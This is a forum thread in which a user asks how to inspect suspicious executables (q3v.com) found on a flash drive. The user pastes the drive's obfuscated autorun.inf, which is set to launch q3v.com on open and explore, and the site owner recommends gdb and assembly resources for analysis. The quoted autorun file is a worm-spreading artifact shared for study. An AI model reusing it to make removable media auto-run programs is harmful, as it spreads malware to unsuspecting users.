how do you open exe files?

For beginners, flames not allowed...(just by the staff :P)
skip
Fame ! Where are the chicks?!

how do you open exe files?

Post by skip »

how do you open executable files in ubuntu, i mean what program should i use to see whats inside of that file? heres the scenario, im on windows xp sp3 with comodo anti-virus and firewall and my friend asks me to reformat his sd card but i didnt got to reformat it coz of some problems with his card, then another friend came by asks me to reformat his mp3 player (those made from china). i did it on normal mode but some permission thing says that it cant be reformatted so i did it on safe mode. its now reformatted, my problem is when i inserted my own flash drive in, something came inside my flash drive taht i didnt notice it at all, i just notice it when i booted on ubuntu. some pop up message says
This medium contains software intended to be automatically started. Would you like to run it?

The software will run directly from the medium "skip". You should never run software that you don't trust.

If in doubt, press Cancel.
so i click cancel and ive seen a couple of files im not really familiar with. like q3v.com and uaacifr.com. i tried googling it but no chances so i guess i should ask the guys at suck-o. i know that theres an autorun.inf in. heres the info but i cant read it coz i dont know which encryption theyd use.
;aA34d1wDSZ0f3k21k44DZK4aAq0dwK8Sk2c

[AutoRun]

;waoiLlK3LAipHoO0ja3sloKd813adr17wfdSAwLD42mwcLKD21ls23pwksFaaa0aqw43A13AZdiDo

open=q3v.com

;ledrC0

shell\open\Command=q3v.com

;j3iiJi0pkallKa2DdAAwSKasAiAi2asck42adqkdK2seqa

shell\open\Default=1

;k8eKm5w2k8C345lF02iL

shell\explore\Command=q3v.com

;skk5dlseq4aKkal052AL35ksdCrkiSwkSLi541Z4f3Krow5aZaXiqdaps4qiL2DKl8s4LsS3
i did not delete the file yet. i wish to study, read the file so i can prevent any future damages that may happen on my pc. thanks :D
Image Image Image

bad_brain
Site Owner
Site Owner

Post by bad_brain »

hm, you could disassemble the exe on Linux by using gdb:
http://www.gnu.org/software/gdb/

the package is in the Ubuntu repositories, so you can simply install it, the package name is "gdb"....gdb is command line only, if you want a GUI install "xxgdb".

but of course you will either need a good understanding of ASM or a little luck to find clear text segments in the disassembled hex dump.

:wink:

skip

Post by skip »

oh thanks. do you happen to have any links, tuts or anything i can read about it. ASM is assembly language? i just installed xxgdb, i dont have any idea where to start. i actually dont have any idea at all. :?
Image Image Image

bad_brain
Site Owner
Site Owner

Post by bad_brain »

check the "external links" here:
http://en.wikipedia.org/wiki/Assembly_language
you should find some good places to start I guess.
for gdb take a look here:
http://www.gnu.org/software/gdb/

but if you want to get into Assembly ONLY to check this file I don't really recommend it, because learning Assembly is nothing that can be done in a week..... :wink:

skip

Post by skip »

its all good. thanks for the links. maybe i'l get somewhere from there.
Image Image Image